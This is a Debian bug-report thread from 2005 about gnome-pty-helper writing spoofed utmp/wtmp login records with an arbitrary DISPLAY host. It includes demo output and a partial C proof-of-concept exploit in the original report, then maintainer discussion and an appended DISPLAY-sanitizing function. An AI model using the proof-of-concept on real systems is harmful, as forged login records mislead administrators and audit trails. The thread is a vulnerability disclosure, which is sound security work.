Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-30 Thread Loïc Minier
tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312
clone 329156 -1
reassign -1 libvte4
thanks

[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]

Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 This vulnerability is identified as CAN-2005-0023.  The upstream
 developers of vte have been notified of the bug at:


 Bye,
-- 
Loïc Minier <[EMAIL PROTECTED]>



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Paul Szabo
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole


gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.

Demo output, code below.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


OUTPUT:

[EMAIL PROTECTED]:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz      pts/2        Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz      pts/2        Sep 20 08:40 (xyz)
psz      pts/1        Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
psz      31358  0.0  0.3 10340 7768 ?        S    08:14   0:00 xterm -T [EMAIL PROTECTED] -n [EMAIL PROTECTED] -sb -sl 1 -ls
psz      31444  0.0  0.0  1484  380 pts/1    S    08:21   0:00 gnome-pty-helper-exploit xyz
psz      31446  0.0  0.0  1696  604 pts/1    S    08:21   0:00 gnome-pty-helper
psz      31454  0.0  0.0  2496  848 pts/1    R+   08:21   0:00 ps aux
[1]+  Done                    gnome-pty-helper-exploit xyz
psz      pts/1        Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)


CODE:

/*
Must be compiled against (within)
gnome-libs-1.4.2/zvt
because it uses *.h files from there.
Code "stolen" from subshell.c .
*/

#include 

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG  4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol  [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

#include 
#include 

static struct cmsghdr *cmptr;
#define CONTROLLEN  sizeof (struct cmsghdr) + sizeof (int)

static int
receive_fd (int helper_fd)
{
struct iovec iov [1];
struct msghdr msg;
char buf [32];

iov [0].iov_base = buf;
iov [0].iov_len  = sizeof (buf);
msg.msg_iov  = iov;
msg.msg_iovlen   = 1;
msg.msg_name = NULL;
msg.msg_namelen  = 0;

if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
return -1;
msg.msg_control = (caddr_t) cmptr;
msg.msg_controllen = CONTROLLEN;

if (recvmsg (helper_fd, &msg, 0) <= 0)
return -1;

return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
GnomePtyOps op;
int result, n;
void *tag;

if (helper_pid == -1)
return NULL;

if (helper_pid == 0){
if (s_pipe (helper_socket_protocol) == -1)
return NULL;

if (s_pipe (helper_socket_fdpassing) == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
return NULL;
}

helper_pid = fork ();

if (helper_pid == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);
return NULL;
}

if (helper_pid == 0){
close (0);
close (1);
dup2 (helper_socket_protocol  [1], 0);
dup2 (helper_socket_fdpassing [1], 1);

/* Close aliases */
close (helper_socket_protocol  [0]);
close (helper_socket_protocol  [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);

execl ("/usr/sbin/gnome-pty-helper", 
"gnome-pty-helper", NULL);
exit (1);
} else {
close (helper_socket_fdpassing [1]);
close (helper_socket_protocol  [1]);

/*
 * Set the close-on-exec flag for the other
 * descriptors, these should never propagate
 * (otherwise gnome-pty-helper won't notice when
 * this process is killed).
 */
fcntl (helper_socket_proto

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Steve Langasek
On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
> Package: libzvt2
> Version: 1.4.2-19
> Severity: critical
> File: /usr/sbin/gnome-pty-helper
> Justification: root security hole

> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

Why is this filed at severity: critical?  What is the attack vector here
which permits root privilege escalation?

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/




Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Paul Szabo
Steve,

>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical?  What is the attack vector here
> which permits root privilege escalation?

I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)

(In fact I cannot think of any attacks: I cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts; that is how I
looked at gnome-pty-helper.)

Cheers, Paul

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Steve Langasek
On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:

> >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> >> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> >> existing records.

> > Why is this filed at severity: critical?  What is the attack vector here
> > which permits root privilege escalation?

> I do not know any root escalation methods. When using reportbug, those
> options seemed to fit best, apologies if they were not; please change if
> appropriate. (For future reference: which options should I have used
> instead?)

Hmm... After rereading the definition at
, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.

Cheers,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/




Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Loïc Minier
Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 Thanks for your report.

 Do you have a CVE ID for this security issue?

 Did you check whether libvte4 is affected?

 Do you have a fix?

   Thanks,

-- 
Loïc Minier <[EMAIL PROTECTED]>



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Paul Szabo
Dear Loic,

>  Do you have a CVE ID for this security issue?

No. Sorry, I do not know how to get one. (Nor am I sure if this is serious
enough to deserve one.)

>  Did you check whether libvte4 is affected?

No. Do not know what libvte4 is.

>  Do you have a fix?

No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Loïc Minier
On Mon, Sep 26, 2005, Paul Szabo wrote:
> No. Sorry, I do not know how to get one. (Nor am I sure if this is serious
> enough to deserve one.)

 Then I'll see whether it deserves one, and attempt to request one.

> >  Did you check whether libvte4 is affected?
> No. Do not know what libvte4 is.

 libvte4 is the GNOME 2 equivalent of libzvt2, you can grab it from:

 the source package for this library is "vte".

 It'd be nice if you could check whether the gnome-pty-helper shipped in
 libvte4 is affected too.  Let me know if you don't have a setup
 permitting the check, or if you lack the time.

   Bye,

-- 
Loïc Minier <[EMAIL PROTECTED]>



Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Paul Szabo
Dear Loic,

>> >  Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 equivalent of libzvt2 ...
> It'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too.  Let me know if you don't have a setup
> permitting the check, or if you lack the time.

Looking at the source

  vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c

in line 682 it grabs 
display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia
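The thread's finding is that gnome-pty-helper copies getenv("DISPLAY") straight into the utmp host field. The following is an added example, not code from gnome-pty-helper, vte or this bug report, of the syntactic check a setuid helper could apply before using that value: it rejects empty strings, control characters, over-long values and anything not shaped like host:number[.screen], so the "xyz" record from the demo above would be refused. It only narrows what can be written; it cannot establish that the caller actually owns the named display, which is the trust problem the report describes.

```c
/* Added example: validate a DISPLAY value before it is stored as a
 * utmp ut_host.  Assumes the usual X form [host]:number[.screen]
 * and a caller-supplied destination size (e.g. sizeof ut->ut_host). */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Only characters that can legitimately appear in a hostname or
 * display specification are accepted; no whitespace, no controls. */
static int display_char_ok(unsigned char c)
{
    return isalnum(c) || c == '.' || c == '-' || c == '_' || c == ':';
}

/* Copy display into out (capacity outsz) if it is well formed.
 * Returns 0 on success, -1 if the value is rejected.  On rejection
 * nothing is written, so the caller should log no host at all rather
 * than a truncated or partially checked one. */
int sanitize_display(const char *display, char *out, size_t outsz)
{
    const char *colon;
    size_t len, i;

    if (display == NULL || out == NULL || outsz == 0)
        return -1;
    len = strlen(display);
    /* Refuse values that do not fit; silent truncation would let an
     * over-long string masquerade as a different host. */
    if (len == 0 || len >= outsz)
        return -1;
    for (i = 0; i < len; i++)
        if (!display_char_ok((unsigned char)display[i]))
            return -1;
    /* Exactly one ':' and it must be followed by a display number. */
    colon = strchr(display, ':');
    if (colon == NULL || strchr(colon + 1, ':') != NULL ||
        !isdigit((unsigned char)colon[1]))
        return -1;
    memcpy(out, display, len + 1);
    return 0;
}
```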

